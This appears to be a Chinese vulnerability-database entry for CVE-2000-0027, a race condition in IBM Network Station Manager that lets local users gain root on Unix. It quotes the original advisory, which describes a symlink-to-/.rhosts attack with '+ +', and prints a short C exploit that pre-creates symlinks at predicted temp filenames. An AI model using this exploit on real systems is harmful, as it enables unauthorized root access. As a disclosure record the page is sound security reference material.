IBM网站管理者竞争条件漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105659 漏洞类型 竞争条件
发布时间 1999-12-27 更新时间 2005-05-02
CVE编号 CVE-2000-0027 CNNVD-ID CNNVD-199912-093
漏洞平台 Unix CVSS评分 6.2
|漏洞来源
https://www.exploit-db.com/exploits/19697
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-093
|漏洞详情
IBM网站管理者NetStation存在漏洞,本地用户利用该漏洞通过一个符号链接攻击获得特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/900/info

IBM's Network Station Manager is a client/server application which facilitates management for IBM Network Stations. It is possible to locally gain root priviliges on hosts running the NetStation daemon. NetStation (which runs as root) creates temporary files in /tmp with predictable filenames based on a known partial filename and the current system time, creating a race condition which can lead to root compromise if the race is won. A symlink would have to be created with a correct predicted filename that points to (for example) /.rhosts, causing NetStation to write to it. The attacker would then add "+ +" to the file, chown root it and rlogin (or rsh in) as root.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>

void main() {

/* Change these paths */
char dest[20] = "/.rhosts";
char source[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
char sourcesym[50] = "/usr/netstation/nsm/users/xnec/xnec.nsu";
long sec;
int i;
sec = time(0);
for (i = 0; i < 30; i++) {
sprintf(sourcesym, "%s%d", source, (sec + i));
symlink(dest,sourcesym);
}

}
|参考资料

来源:BID
名称:900
链接:http://www.securityfocus.com/bid/900
来源:BUGTRAQ
名称:19991227IBMNetStation/UnixWarelocalrootexploit
链接:http://www.securityfocus.com/archive/1/39962
来源:XF
名称:ibm-netstat-race-condition(5381)
链接:http://www.iss.net/security_center/static/5381.php